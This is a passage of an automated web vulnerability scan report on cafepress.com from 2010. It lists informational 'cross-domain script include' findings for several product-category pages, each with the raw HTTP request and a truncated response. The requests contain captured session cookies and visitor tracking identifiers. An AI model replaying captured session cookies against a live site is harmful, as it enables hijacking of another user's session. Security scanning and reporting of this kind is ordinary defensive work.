Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 65212
Date: Sun, 26 Dec 2010 13:48:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
Set-Cookie: cp_sc=202063; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:28 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content5.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.23. http://www.cafepress.com/+journals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+journals

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content0.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+journals HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59322
Date: Sun, 26 Dec 2010 13:48:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cp_sc=100229; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:47 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content0.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.24. http://www.cafepress.com/+keepsake_boxes previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+keepsake_boxes

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+keepsake_boxes HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 59018
Date: Sun, 26 Dec 2010 13:48:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cp_sc=100175; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.25. http://www.cafepress.com/+license_plate_frames previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+license_plate_frames

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+license_plate_frames HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 59931
Date: Sun, 26 Dec 2010 13:48:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
Set-Cookie: cp_sc=100230; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:27 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.26. http://www.cafepress.com/+magnets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+magnets

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+magnets HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 59159
Date: Sun, 26 Dec 2010 13:48:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cp_sc=100214; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content7.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.27. http://www.cafepress.com/+mousepads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+mousepads

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+mousepads HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 56857
Date: Sun, 26 Dec 2010 13:48:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/
Set-Cookie: cp_sc=200051; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:36 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 56857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.28. http://www.cafepress.com/+mugs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+mugs

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+mugs HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
